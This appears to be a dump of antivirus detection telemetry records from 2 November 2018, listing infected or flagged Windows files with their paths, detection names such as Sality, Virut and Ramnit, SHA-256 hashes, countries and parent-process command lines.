  Row(detection=Row(filename='nircmd.exe', filepath='G:\\a phuong\\New Folder (2)\\Boot\\DLCD\\Programs\\nircmd.exe', filesize=128000, name='W32/Sality.AT.#M1.#R1'), hash='18216442e8316f4f4a93fa536dc3a231e7af31d46894060e14defa1c0d7fb4c7', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:17:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='data.exe', filepath='I:\\ألعاب\\Games 1\\بليردو\\RECOIL\\PingPong3D\\DATA\\DATA.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='183d110a328ffdcec666fbc97c7fae5f4c055094110cdd6de564ffb77abe9bd6', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:41:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tskill.exe', filepath='d:\\windows\\system32\\tskill.exe', filesize=512000, name='W32/Virut.Gen.#M1.#R1'), hash='188c33b25279134945a91f3fc47195f14faf4385d48ae544fcb3890e8eaf2e38', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:38:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='f1387646624.dll', filepath='D:\\retry\\recup_dir.1992\\f1387646624.dll', filesize=128000, name='TR/Crypt.XPACK.Gen3.#M300.#R200144'), hash='18ba5f765bfda3b8f3e3a5eb112d852d8659de619c43ad87359627b41e79f50a', metadata=Row(cmdline=None, country='AU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-02T14:00:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='videodownloadconvert.856a56d2f9d74b499bc57785848a5890.exe', filepath='E:\\1 PASTA GERAL 2. 11 .2018\\VideoDownloadConvert.856a56d2f9d74b499bc57785848a5890.exe', filesize=368000, name='PUA/MyWebSearch.Gen.#M300.#R6777'), hash='1924b027eb4aaadfeaae0dafd66fbbb2e5a7a5c00bb8869d55d449ec8ad5c4e2', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-02T14:42:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='cfp.exe', filepath='D:\\Tool\\Miracle Box V2.27A Crack\\Miracle Box 2.27A Crack\\Miracle Box 2.27A Crack\\TOOLS\\Blackberry\\cfp\\cfp.exe', filesize=15104000, name='W32/Ramnit.CD.#M1.#R1'), hash='192bbada9657ae3c8726276206a4bd97e7efa016dd7b15591dabd30876056a45', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Mozilla Firefox\\firefox.exe', parentsize=450512, timestamp='2018-11-02T04:38:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='a25b0ff698ae1f170428b2d709e55e5e08cc1b8d', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\a25b0ff698ae1f170428b2d709e55e5e08cc1b8d', filesize=2112000, name='Adware/DealPly.193e42.#M1.#R1'), hash='193e42dc8533ae96534541d78d54719cf50e50d64ddf22c8588cf3519bae3d3b', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T20:40:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='gpusniffer.exe', filepath='C:\\Program Files (x86)\\Adobe\\Adobe Audition CS6\\GPUSniffer.exe', filesize=100000, name='W32/Sality.AT.#M1.#R1'), hash='194728e585494a63ef409177dd1058087fedabc08a76dfe6fc6f74cf585a65ba', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:pZjwHKFYTUavmQU1.1', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T19:11:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='19db880a0ac3f7a8dc75d7cdb88a02b5ca846e896bc92a1a68b5c1b72ee68205', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-36\\19DB880A0AC3F7A8DC75D7CDB88A02B5CA846E896BC92A1A68B5C1B72EE68205', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='19db880a0ac3f7a8dc75d7cdb88a02b5ca846e896bc92a1a68b5c1b72ee68205', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:02:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='19db880a0ac3f7a8dc75d7cdb88a02b5ca846e896bc92a1a68b5c1b72ee68205', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-36\\19DB880A0AC3F7A8DC75D7CDB88A02B5CA846E896BC92A1A68B5C1B72EE68205', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='19db880a0ac3f7a8dc75d7cdb88a02b5ca846e896bc92a1a68b5c1b72ee68205', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:41:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-191705-0966e30a', filepath='C:\\ProgramData\\Avira\\AntiVir Desktop\\TEMP\\AvGuardIA_5189a34d\\AVSCAN-20181102-184958-774024B1\\AVSCAN-20181102-191705-0966E30A', filesize=96000, name='PUA/FindWide.#M1.#R1'), hash='19f9df7b544f1a348919908811f5b52f666afb91d51847b767f07131661b2bd0', metadata=Row(cmdline=None, country='ES', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T18:16:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='getdatantfs.exe', filepath="D:\\2016\\Hiren's BootCD 15.2 Rebuild All in One Bootable CD\\Hiren's BootCD 15.2 Rebuild All in One Bootable CD\\12.Hiren.s.Boot.CD.15.2\\HBCD\\Programs\\GETDATANTFS.exe", filesize=64000, name='TR/Siggen.64000.4.#M1.#R1'), hash='1a0201670260af68cb64af6267548b81214dc43129bf9e200edad39000c22236', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2755504, timestamp='2018-11-02T03:16:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-081041-182c760b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_78554da8\\AVSCAN-20181102-081017-150DB878\\AVSCAN-20181102-081041-182C760B', filesize=64000, name='TR/Siggen.64000.4.#M1.#R1'), hash='1a0201670260af68cb64af6267548b81214dc43129bf9e200edad39000c22236', metadata=Row(cmdline=None, country='MT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T07:10:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='getdatantfs.exe', filepath='E:\\HBCD\\Programs\\GETDATANTFS.exe', filesize=64000, name='TR/Siggen.64000.4.#M1.#R1'), hash='1a0201670260af68cb64af6267548b81214dc43129bf9e200edad39000c22236', metadata=Row(cmdline=None, country='MT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-02T07:10:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-102018-a15398b7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2d3db38b\\AVSCAN-20181102-101826-91C75354\\AVSCAN-20181102-102018-A15398B7', filesize=64000, name='TR/Siggen.64000.4.#M1.#R1'), hash='1a0201670260af68cb64af6267548b81214dc43129bf9e200edad39000c22236', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T03:20:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='in_cdda.dll', filepath='C:\\Program Files (x86)\\Winamp\\Plugins\\in_cdda.dll', filesize=128000, name='W32/Ramnit.CD.#M1.#R1'), hash='1a1041c8595122105905c56fee9ca4f9648260e6b2e726bedc6b32b8bf9d4c91', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe', parentsize=1426264, timestamp='2018-11-02T15:25:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='1abc6468bcb64cf4de3de544a6035b6c41b2f47c1bcb5bad554faebac0e6cb9f', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\1ABC6468BCB64CF4DE3DE544A6035B6C41B2F47C1BCB5BAD554FAEBAC0E6CB9F', filesize=2240000, name='TR/Taranis.3013.#M1.#R1'), hash='1abc6468bcb64cf4de3de544a6035b6c41b2f47c1bcb5bad554faebac0e6cb9f', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-anf=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\Rar$LS0.126\\\\\\" -scul -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T10:33:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='1abc6468bcb64cf4de3de544a6035b6c41b2f47c1bcb5bad554faebac0e6cb9f', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\1ABC6468BCB64CF4DE3DE544A6035B6C41B2F47C1BCB5BAD554FAEBAC0E6CB9F', filesize=2240000, name='TR/Taranis.3013.#M1.#R1'), hash='1abc6468bcb64cf4de3de544a6035b6c41b2f47c1bcb5bad554faebac0e6cb9f', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-38.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-37.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T13:27:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='1abc6468bcb64cf4de3de544a6035b6c41b2f47c1bcb5bad554faebac0e6cb9f', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\1ABC6468BCB64CF4DE3DE544A6035B6C41B2F47C1BCB5BAD554FAEBAC0E6CB9F', filesize=2240000, name='TR/Taranis.3013.#M1.#R1'), hash='1abc6468bcb64cf4de3de544a6035b6c41b2f47c1bcb5bad554faebac0e6cb9f', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-38.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-4.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\...\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-9.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-37.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T10:56:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mugen character maker.exe', filepath='I:\\ألعاب\\Games 1\\Dd251.N\\MUGEN Character Maker\\MUGEN Character Maker.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='1ac0d838d1850a7c49e9a6d0c1d20c35774922835208858760a9be9034dba420', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:39:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-072314-aa0d6b35', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_456596c3\\AVSCAN-20181102-072257-A7ED4A92\\AVSCAN-20181102-072314-AA0D6B35', filesize=512000, name='PUA/DownloadSponsor.Gen.#M300.#R5738'), hash='1ad3dc1b91444427813e416a12f0860a4dac55c14cf561e4df068c60bc6b2206', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T06:23:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='m5.exe', filepath='I:\\ألعاب\\Games 1\\بليردو\\RECOIL\\ZBD\\M5\\M5.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='1af8cbad8436e05a98ea561933d87ba9c585bd9508ba49ff7cff86234ddbb448', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:41:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wmlaunch.exe', filepath='C:\\Program Files\\Windows Media Player\\wmlaunch.exe', filesize=256000, name='W32/Virut.Gen.#M1.#R1'), hash='1b481de0fcc213f8f8a881cc26e76c0310da9b046ed365460119fa90cfee23c0', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T19:00:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wmlaunch.exe', filepath='C:\\Program Files\\Windows Media Player\\wmlaunch.exe', filesize=256000, name='W32/Virut.Gen.#M1.#R1'), hash='1b481de0fcc213f8f8a881cc26e76c0310da9b046ed365460119fa90cfee23c0', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T21:23:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wmlaunch.exe', filepath='C:\\Program Files\\Windows Media Player\\wmlaunch.exe', filesize=256000, name='W32/Virut.Gen.#M1.#R1'), hash='1b481de0fcc213f8f8a881cc26e76c0310da9b046ed365460119fa90cfee23c0', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T20:20:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='afuwin.exe', filepath='E:\\Program Files\\ASUS\\AI Suite II\\ASUS Update\\Compal\\32\\afuwin.exe', filesize=336000, name='W32/Sality.AT.#M1.#R1'), hash='1b55afb78f6ef9b3a010aba4ffe52bb8ba2e4b4a198aa2537ddf40a47c4746d3', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T03:22:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='afuwin.exe', filepath='E:\\Program Files\\ASUS\\AI Suite II\\ASUS Update\\Compal\\32\\afuwin.exe', filesize=336000, name='W32/Sality.AT.#M1.#R1'), hash='1b55afb78f6ef9b3a010aba4ffe52bb8ba2e4b4a198aa2537ddf40a47c4746d3', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:30:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='afuwin.exe', filepath='E:\\Program Files\\ASUS\\AI Suite II\\ASUS Update\\Compal\\32\\afuwin.exe', filesize=336000, name='W32/Sality.AT.#M1.#R1'), hash='1b55afb78f6ef9b3a010aba4ffe52bb8ba2e4b4a198aa2537ddf40a47c4746d3', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:43:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='1b6ee61bfadee9a58d07ae09a7c5df9756034bfb43e6b6c797858aae9244d07c', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-20\\1B6EE61BFADEE9A58D07AE09A7C5DF9756034BFB43E6B6C797858AAE9244D07C', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='1b6ee61bfadee9a58d07ae09a7c5df9756034bfb43e6b6c797858aae9244d07c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:17:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp00001c65', filepath='C:\\Windows\\Temp\\tmp00000622\\tmp00001c65', filesize=17408000, name='TR/Taranis.395.#M1.#R1'), hash='1b943e6140f291152a8342edeb70df40993bf25bd0c11a24ca1eeb9620203200', metadata=Row(cmdline='\\\\\\/service', country='IR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Imen\\Imen Internet Security\\vsserv.exe', parentsize=1550296, timestamp='2018-11-02T09:13:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='paper_11.htm', filepath='C:\\Users\\X\\Dropbox (TANTO CITRA MANDIRI)\\TANTO CITRA MANDIRI Team Folder\\Campur2\\File Epson\\Manual\\SetupGuide\\UZ\\paper_11.htm', filesize=12000, name='W32/Chir.B.#M1.#R1'), hash='1c1b971371faee0937c17e1ce16c3f8a32a30f6996c4a17729c9ff9754893179', metadata=Row(cmdline='\\\\\\/systemstartup', country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\Dropbox\\Client\\Dropbox.exe', parentsize=3784512, timestamp='2018-11-02T07:47:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='new folder.exe', filepath='\\\\NERA001\\Stock Sim รวม\\New Folder.exe', filesize=1536000, name='TR/Patched.Ren.Gen.#M300.#R3264'), hash='1c4a096765790c142a8d5727b5cfc4191c090afb49dc9a6b9be6bca4ebfddd4a', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-02T04:28:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='new folder.exe', filepath='\\\\NERA001\\Stock Sim รวม\\New Folder.exe', filesize=1536000, name='TR/Patched.Ren.Gen.#M300.#R3264'), hash='1c4a096765790c142a8d5727b5cfc4191c090afb49dc9a6b9be6bca4ebfddd4a', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-02T09:39:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='1c4f8770d08a4d70d44fefa5205045151274c81ccab9e3d90f26b7f641561ebf', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\1C4F8770D08A4D70D44FEFA5205045151274C81CCAB9E3D90F26B7F641561EBF', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='1c4f8770d08a4d70d44fefa5205045151274c81ccab9e3d90f26b7f641561ebf', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-38.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-4.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\...\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-9.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-37.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T11:12:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='1c4f8770d08a4d70d44fefa5205045151274c81ccab9e3d90f26b7f641561ebf', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\1C4F8770D08A4D70D44FEFA5205045151274C81CCAB9E3D90F26B7F641561EBF', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='1c4f8770d08a4d70d44fefa5205045151274c81ccab9e3d90f26b7f641561ebf', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-anf=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\Rar$LS0.126\\\\\\" -scul -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T11:18:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='1c4f8770d08a4d70d44fefa5205045151274c81ccab9e3d90f26b7f641561ebf', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\1C4F8770D08A4D70D44FEFA5205045151274C81CCAB9E3D90F26B7F641561EBF', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='1c4f8770d08a4d70d44fefa5205045151274c81ccab9e3d90f26b7f641561ebf', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:44:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='csupdate.exe', filepath='D:\\PLAQUINHAS DIVERTIDAS\\PROGRAMAS\\acad2014 32bits\\x86\\RC2014\\Program Files\\Autodesk\\Autodesk ReCap\\csupdate.exe', filesize=192000, name='W32/Stanit.#M1.#R1'), hash='1c5848b14bc8ebb210f05417a14347591e0dc3b600a10a1afa49ad049f05a020', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T04:30:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181103-051127-d515b701', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6122e679\\AVSCAN-20181103-044944-1F899F70\\AVSCAN-20181103-051127-D515B701', filesize=64000, name='TR/Crypt.XPACK.Gen.#M300.#R3769'), hash='1cba90497fecccb4be2afd31e0f8794ea23c3df658ba3da01173d9c08aded7e1', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T21:11:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-104332-ff070b2d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_66ae5795\\AVSCAN-20181102-103738-DCC08D26\\AVSCAN-20181102-104332-FF070B2D', filesize=64000, name='TR/Crypt.XPACK.Gen.#M300.#R3769'), hash='1cba90497fecccb4be2afd31e0f8794ea23c3df658ba3da01173d9c08aded7e1', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T02:43:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-105319-37ca7302', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_66ae5795\\AVSCAN-20181102-103738-DCC08D26\\AVSCAN-20181102-105319-37CA7302', filesize=64000, name='TR/Crypt.XPACK.Gen.#M300.#R3769'), hash='1cba90497fecccb4be2afd31e0f8794ea23c3df658ba3da01173d9c08aded7e1', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T02:53:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-104353-01051a89', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_66ae5795\\AVSCAN-20181102-103738-DCC08D26\\AVSCAN-20181102-104353-01051A89', filesize=64000, name='TR/Crypt.XPACK.Gen.#M300.#R3769'), hash='1cba90497fecccb4be2afd31e0f8794ea23c3df658ba3da01173d9c08aded7e1', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T02:43:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-105445-40160a14', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_66ae5795\\AVSCAN-20181102-103738-DCC08D26\\AVSCAN-20181102-105445-40160A14', filesize=64000, name='TR/Crypt.XPACK.Gen.#M300.#R3769'), hash='1cba90497fecccb4be2afd31e0f8794ea23c3df658ba3da01173d9c08aded7e1', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T02:54:46Z'), dt=datetime.date(2018, 11, 2)),
